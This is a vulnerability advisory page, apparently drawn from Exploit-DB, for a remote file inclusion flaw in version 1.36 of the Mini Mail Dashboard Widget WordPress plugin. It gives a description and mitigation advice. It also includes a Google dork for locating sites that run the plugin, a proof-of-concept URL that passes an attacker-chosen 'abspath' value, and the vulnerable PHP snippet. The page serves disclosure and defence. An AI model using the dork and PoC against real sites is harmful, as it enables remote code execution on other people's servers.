Mini Mail Dashboard Widget Wordpress plugin RFI

vendor:

Mini Mail Dashboard Widget

by:

Ben Schmidt

9.3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Mini Mail Dashboard Widget

Affected Version From: 1.36

Affected Version To: 1.36

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:mini_mail_dashboard_widget

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Mini Mail Dashboard Widget WordPress plugin RFI

The Mini Mail Dashboard Widget Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious POST request to the wp-mini-mail.php file with an 'abspath' parameter containing a URL pointing to a malicious file. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application. Additionally, ensure that the application is running the latest version of the Mini Mail Dashboard Widget plugin.

Source

Exploit-DB raw data:

# Exploit Title: Mini Mail Dashboard Widget Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)

---
Vulnerable Code
---
if (isset($_FILES['wpmm-upload'])) {
	// Create WordPress environmnt
	require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');

	// Handle attachment
	WPMiniMail::wpmm_upload();
}